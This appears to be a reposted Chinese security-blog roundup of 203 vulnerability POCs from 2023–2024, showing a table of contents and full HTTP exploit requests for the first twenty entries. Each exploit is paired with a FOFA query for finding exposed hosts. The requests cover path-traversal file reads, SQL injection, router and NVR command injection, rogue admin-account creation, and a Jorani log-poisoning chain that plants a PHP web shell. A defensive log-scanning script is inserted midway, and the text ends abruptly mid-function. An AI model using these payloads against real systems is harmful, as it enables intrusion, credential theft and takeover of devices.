Public Internet Vulnerability Roundup 202309-202406 (repost)

Posted 2024-6-5 14:31:29
Public Internet Vulnerability Roundup 202309-202406
道一安全 (Daoyi Security), 2024-06-05 07:41, Beijing
The following article originates from 网络安全新视界 (author: 网络安全新视界).

Purpose: exploitation of N-day vulnerabilities accounts for a large share of real-world attacks, so this compilation is meant to help defenders. Defensive teams can use the entries below for risk triage.

Vulnerability sources: the article covers 203 high-impact vulnerability POCs published in China and abroad between September 2023 and May 2024. All of them were collected from other public accounts or websites and were compiled and published by the 网络安全新视界 team.

Security patches: every entry is a publicly disclosed vulnerability; for patches or remediation guidance, contact the product vendor.

Content: because of space limits, a few over-long POCs are abbreviated with the placeholder PAYLOAD; search for the full POC yourself if you need it.

Legal: if any content infringes a party's legitimate rights, contact the 网络安全新视界 team through the account backend and the material will be removed.

Statement

To keep things simple and easy to browse, there is no "reply to see the full list". This article is the complete, current version; search the page for keywords (the original suggests F12).

Bookmark this article if it is useful, and follow the public account (网络安全新视界).

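The roundup's stated use is defensive triage. What follows is an added example, not part of the original article and not code from any product listed in it: a small Python scanner that walks web-server access logs and matches request lines against a handful of the endpoint signatures from this list. It canonicalises paths the way the targeted frameworks do before routing (repeated percent-decoding, Spring matrix parameters such as `;.ico`, `.` and `..` segments), because several of the POCs below rely on exactly those tricks to get past WAF rules or authentication filters. The log format, the signature table and the sample log lines are assumptions constructed for the example; a combined log carries only the request line, so POST-body payloads (fastjson, log4j, the Jorani log poisoning) are matched on their endpoint path alone.

```python
import re
import urllib.parse
from typing import List, Tuple

# Apache/Nginx "combined" line up to the status code. Bodies are not logged, so
# POST-only payloads (fastjson, log4j, Jorani log poisoning) match on path only.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: HTTP/[\d.]+)?" \d{3}')

# Endpoint signatures lifted from the POCs on this page, matched against the
# canonicalised path. Starter set only; extend it from the rest of the roundup.
PATH_SIGNATURES = [
    ("StarRocks unauthenticated /mem_tracker", r"^/mem_tracker$"),
    ("EasyCVR userlist disclosure / adduser", r"^/api/v1/(userlist|adduser)$"),
    ("NUUO NVR __debugging_center_utils___.php RCE", r"^/__debugging_center_utils___\.php$"),
    ("Sangfor NGAF loadfile.php file read", r"^/svpn_html/loadfile\.php$"),
    ("jshERP getAllList disclosure", r"^/jshERP-boot/user/getAllList$"),
    ("Dahua ICC readPic file read", r"^/evo-apigw/evo-cirs/file/readPic$"),
    ("Dahua ICC user/is-exist (log4j)", r"^/evo-apigw/evo-brm/1\.2\.0/user/is-exist$"),
    ("Yonyou NC accept.jsp upload", r"^/aim/equipmap/accept\.jsp$"),
    ("Jorani poisoned log view", r"^/pages/view/log-"),
]
# Payload markers that survive in a GET query string (checked after full decoding).
QUERY_MARKERS = [
    ("MySQL error-based SQLi", r"(extractvalue|updatexml)\s*\("),
    ("MSSQL time-based SQLi", r"waitfor\s+delay"),
    ("JNDI lookup string", r"\$\{jndi:"),
    ("file: URL in parameter", r"=file:"),
]
FILE_MARKER = re.compile(r"/etc/(?:\./)*passwd|win\.ini|jdbc\.properties|WEB-INF", re.I)

def decode_fully(s: str, rounds: int = 3) -> str:
    """Percent-decode until stable (bounded), so %2527 is judged as the quote it becomes."""
    for _ in range(rounds):
        d = urllib.parse.unquote(s)
        if d == s:
            break
        s = d
    return s

def canonical_path(target: str) -> Tuple[str, List[str]]:
    """Reduce the path the way a Spring/PHP router does and record the tricks used:
    matrix params (getAllList;.ico), '.' (/etc/./passwd), '..' (a.ico/../getAllList)."""
    flags, segs = set(), []
    for seg in decode_fully(target.split("?", 1)[0]).split("/"):
        if ";" in seg:
            flags.add("matrix-parameter")
            seg = seg.split(";", 1)[0]
        if seg in ("", "."):
            if seg == ".":
                flags.add("dot-segment")
        elif seg == "..":
            flags.add("dot-dot-segment")
            if segs:
                segs.pop()
        else:
            segs.append(seg)
    return "/" + "/".join(segs), sorted(flags)

def scan_line(line: str) -> List[str]:
    """Findings for one access-log line; [] when nothing matches or the line is malformed."""
    m = LOG_RE.match(line)
    if not m:
        return []
    target = m.group("target")
    path, flags = canonical_path(target)
    once = urllib.parse.unquote(target)
    if urllib.parse.unquote(once) != once:          # a second decode still changed it
        flags.append("double-url-encoding")
    query = decode_fully(target.split("?", 1)[1]) if "?" in target else ""
    findings = ["normalisation-bypass:" + f for f in flags]
    findings += [name for name, rx in PATH_SIGNATURES if re.search(rx, path)]
    findings += [name for name, rx in QUERY_MARKERS if re.search(rx, query, re.I)]
    if FILE_MARKER.search(path + "?" + query):
        findings.append("sensitive file reference")
    return findings

def scan_log(text: str) -> List[Tuple[str, str, List[str]]]:
    """(ip, target, findings) for every line that produced at least one finding."""
    hits = []
    for line in text.splitlines():
        findings = scan_line(line)
        if findings:
            m = LOG_RE.match(line)
            hits.append((m.group("ip"), m.group("target"), findings))
    return hits

# Constructed sample (not real traffic): the page's request shapes plus one benign line.
SAMPLE_LOG = """\
203.0.113.5 - - [05/Jun/2024:10:01:02 +0800] "GET /static/../../../../../../../../etc/passwd HTTP/1.1" 200 1523 "-" "Mozilla/5.0"
203.0.113.5 - - [05/Jun/2024:10:01:09 +0800] "GET /jshERP-boot/user/getAllList;.ico HTTP/1.1" 200 8821 "-" "Mozilla/5.0"
203.0.113.5 - - [05/Jun/2024:10:01:15 +0800] "GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1" 200 8821 "-" "Mozilla/5.0"
198.51.100.7 - - [05/Jun/2024:10:02:40 +0800] "GET /search/index.php?keyword=1%25%32%37%25%32%30and%25%32%30extractvalue(1,concat(0x7e,user(),0x7e))%25%32%33 HTTP/1.1" 500 312 "-" "curl/8.0"
198.51.100.7 - - [05/Jun/2024:10:03:01 +0800] "GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1" 200 1523 "-" "curl/8.0"
198.51.100.7 - - [05/Jun/2024:10:03:30 +0800] "POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1" 200 44 "-" "python-requests/2.31"
192.0.2.10 - - [05/Jun/2024:10:04:00 +0800] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""
```

Run it over a real log with `scan_log(open(path).read())`. A hit that carries a normalisation-bypass flag deserves a look even when the canonical endpoint is not in the table: legitimate clients do not double-encode query strings or put matrix parameters on REST paths.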

Table of contents

1. StarRocks MPP database unauthenticated access
2. Casdoor static arbitrary file read
3. EasyCVR intelligent edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. Sangfor NGAF arbitrary file read
7. 鸿运 (Hongyun) active safety monitoring cloud platform arbitrary file download
8. Phicomm (斐讯) router RCE
9. DocCMS (稻壳CMS) keyword unauthenticated SQL injection
10. Landray EIS smart collaboration platform api.aspx arbitrary file upload
11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. Hongfan (红帆) iOffice ioFileDown arbitrary file read
14. Huaxia ERP (jshERP) sensitive information disclosure
15. Huaxia ERP getAllList information disclosure
16. Hongfan HFOffice 医微云 SQL injection
17. Dahua DSS itcBulletin SQL injection
18. Dahua DSS digital surveillance system user_edit.action information disclosure
19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. Dahua ICC intelligent IoT management platform arbitrary file read
21. Dahua ICC intelligent IoT management platform random remote code execution
22. Dahua ICC intelligent IoT management platform log4j remote code execution
23. Dahua ICC intelligent IoT management platform fastjson remote code execution
24. Yonyou NC 6.5 accept.jsp arbitrary file upload
25. Yonyou NC registerServlet JNDI remote code execution
26. Yonyou NC linkVoucher SQL injection
27. Yonyou NC showcontent SQL injection
28. Yonyou NC grouptemplet arbitrary file upload
29. Yonyou NC down/bill SQL injection
30. Yonyou NC importPml SQL injection
31. Yonyou NC runStateServlet SQL injection
32. Yonyou NC complainbilldetail SQL injection
33. Yonyou NC downTax/download SQL injection
34. Yonyou NC warningDetailInfo interface SQL injection
35. Yonyou NC-Cloud importhttpscer arbitrary file upload
36. Yonyou NC-Cloud soapFormat XXE
37. Yonyou NC-Cloud IUpdateService XXE
38. Yonyou U8 Cloud smartweb2.RPC.d XXE
39. Yonyou U8 Cloud RegisterServlet SQL injection
40. Yonyou U8-Cloud XChangeServlet XXE
41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
42. Yonyou GRP-U8 SmartUpload01 file upload
43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
45. Yonyou GRP-U8 ufgovbank XXE
46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
48. Yonyou U8 CRM swfupload arbitrary file upload
49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP validateLoginName SQL injection
52. Weaver E-Office json_common.php SQL injection
53. DPtech VPN Service arbitrary file upload
54. Chanjet T+ getstorewarehousebystore remote code execution
55. Chanjet T+ getdecallusers information disclosure
56. Chanjet T+ RRATableController / Ufida.T.DI.UIP.ashx deserialization RCE
57. Chanjet T+ keyEdit.aspx SQL injection
58. Chanjet T+ KeyInfoList.aspx SQL injection
59. XETUX dynamiccontent.properties.xhtml remote code execution
60. Byzoro (百卓) Smart management platform importexport.php SQL injection
61. 浙大恩特 CRM fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特脸爱云 face-recognition smart management platform 1.0.55.0.0.1 permission bypass
66. Wanhu ezOFFICE collaboration platform SendFileCheckTemplateEdit SQL injection
67. Wanhu ezOFFICE wpsservlet arbitrary file upload
68. Wanhu ezOFFICE wf_printnum.jsp SQL injection
69. Wanhu ezOFFICE contract_gd.jsp SQL injection
70. Wanhu ezEIP success command execution
71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
72. Seeyon OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. Seeyon M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. Newcapec (新开普) 掌上校园 campus service platform service.action remote command execution
77. F22 garment management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction quality supervision system FileUpload.ashx file upload
79. BYTEVALUE (百为) traffic-control router remote command execution
80. 速达天耀 software DesignReportSave.jsp arbitrary file upload
81. Uniview (宇视) video surveillance main-cgi password disclosure
82. 思福迪 LOGBASE ops security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Tosei (Japan) self-service laundry machine RCE
87. DBAPPSecurity (安恒) 明御 security gateway aaa_local_web_preview file upload
88. DBAPPSecurity 明御 security gateway aaa_portal_auth_config_reset remote command execution
89. Seeyon (致远互联) FE collaborative office platform editflow_manager SQL injection
90. Hikvision IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. Hikvision integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. Hikvision operations management center session command execution
93. QiAnXin 网神 SecGate 3600 firewall app_av_import_save arbitrary file upload
94. QiAnXin 网神 SecGate 3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast (盈可视) HD smart lecture-capture system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated admin account creation
111. WordPress plugin HTML5 Video Player SQL injection
112. WordPress plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. Beijing 百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. Beijing 百绰智能 S20 backend sysmanageajax.php SQL injection
120. Beijing 百绰智能 S40 management platform import web.php arbitrary file upload
121. Beijing 百绰智能 S42 management platform userattestation.php arbitrary file upload
122. Beijing 百绰智能 s200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 engineering quality inspection system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. aiohttp path traversal
127. Glodon (广联达) Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 云商城 (cloud mall) file.php file upload
134. Netentsec (网康) NS-ASG application security gateway index.php SQL injection
135. Netentsec NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat cors SSRF
137. Fujian Kirisun (科立讯) communication command and dispatch platform down_file.php SQL injection
138. Fujian Kirisun communication command and dispatch platform pwd_update.php SQL injection
139. Fujian Kirisun communication command and dispatch platform editemedia.php SQL injection
140. Fujian Kirisun communication command and dispatch platform get_extension_yl.php SQL injection
141. Fujian Kirisun communication command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v4.9.4 path traversal
148. CrushFTP authentication bypass / template injection
149. AJ-Report open-source dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. gradio arbitrary file read
154. 天维尔 fire rescue operations dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特 CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 PACS (medical image archiving and communication system) WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 smart parking fee system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园(安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益价值管理系统 (lean value management system) DownLoad.aspx arbitrary file read
168. Hongjing (宏景) EHR OutputCode arbitrary file read
169. Hongjing EHR downlawbase SQL injection
170. Hongjing EHR DisplayExcelCustomReport arbitrary file read
171. 通天星 CMSV6 vehicle positioning and monitoring platform SQL injection
172. DT HD license-plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. Jinhe (金和) OA C6 FileDownLoad.aspx arbitrary file read
175. Jinhe OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 engineering management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardisation management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardisation management system AddNewsHandler.ashx arbitrary user creation
183. Guangzhou 图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. 瑞友天翼 application virtualisation system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体-佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical image viewer deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. ESAFENET (亿赛通) electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign-trade ERP UploadEmailAttr arbitrary file upload
193. Hillstone (山石网科) 云鉴 security management system setsystemtimeaction command execution
194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 internet behaviour management system send_order.cgi command execution
196. Henan 风速科技 unified authentication platform password reset
197. 浙大恩特 CRM Quotegask_editAction SQL injection
198. 阿里云盘 (Aliyun Drive) WebDAV command injection
199. cockpit assetsmanager_upload interface file upload
200. SeaCMS (海洋影视管理系统) dmku SQL injection
201. Founder (方正) all-media news editing system binary SQL injection
202. WeEngine (微擎) AccountEdit arbitrary file upload
203. 红海云 EHR PtFjk file upload

POC list

1. StarRocks MPP database unauthenticated access
FOFA: title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL

2. Casdoor static arbitrary file read
FOFA: title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

3. EasyCVR intelligent edge gateway userlist information disclosure
FOFA: title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx

4. EasyCVR video management platform arbitrary user creation
FOFA: title="EasyCVR"

Replace the password value with the MD5 of the password you want to set.
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1

5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx

6. Sangfor NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:

7. 鸿运 (Hongyun) active safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:

8. Phicomm (斐讯) router RCE
FOFA: icon_hash="-1344736688"
Log in to the admin backend with the default account admin, then send the following request (the sysauth cookie comes from that login):
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<cookie obtained from the login in step one>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--

9. DocCMS (稻壳CMS) keyword unauthenticated SQL injection
FOFA: app="Doccms"
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
Host: x.x.x.x

The keyword value is the double URL-encoding of the following statement:

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#

10. Landray EIS smart collaboration platform api.aspx arbitrary file upload
FOFA: icon_hash="953405444"

The response to the upload contains the path of the uploaded file.
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"; filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--

11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"
Step 1: obtain the cookies.
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip

The csrf_cookie_jorani value in the response is used in the subsequent requests.
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding

Step 2: POST request. The login field carries PHP that executes a base64-decoded command taken from a request header.
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor

Step 3: send the following request to the target to run the id command. The header value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= is the base64 encoding of the command.
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip

13. Hongfan (红帆) iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip

14. Huaxia ERP (jshERP) sensitive information disclosure
FOFA: body="jshERP-boot"
The leaked data includes usernames and passwords.
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

15. Huaxia ERP getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"
The leaked data includes usernames and passwords.
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:1002
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip

16. Hongfan HFOffice 医微云 SQL injection
FOFA: title="HFOffice"
The POC injects a function call that computes the MD5 of 1234 (HASHBYTES), so a hash in the response confirms execution.
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

17. Dahua DSS itcBulletin SQL injection
FOFA: app="dahua-DSS"
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
  <s11:Body>
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
      <netMarkings>
       (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
      </netMarkings>
    </ns1:deleteBulletin>
  </s11:Body>
</s11:Envelope>

18. Dahua DSS digital surveillance system user_edit.action information disclosure
FOFA: app="dahua-DSS"
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA: app="dahua-DSS"
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

20. Dahua ICC intelligent IoT management platform arbitrary file read
FOFA: body="*客户端会小于800*"
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

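Entries 2, 6, 13 and 20 are one bug class: a request parameter names a file and the server opens it with no containment check, reached with `..` segments, `/./` padding, an absolute Windows path and a `file:` URL respectively. The following is an added illustration in Python, not any vendor's code; the directory layout and the two handler functions are assumptions made for the example. It shows the unsafe join beside a hardened resolver and runs the page's traversal shapes against both.

```python
import os
import tempfile
from urllib.parse import unquote, urlsplit


def read_vulnerable(root: str, user_path: str) -> bytes:
    """The pattern the POCs above exploit: a client-supplied path is joined to a
    base directory with no containment check. '..' walks out of root, './'
    padding slips past naive substring filters, and an absolute path (the
    iOffice c:/windows/win.ini case) makes os.path.join discard root entirely."""
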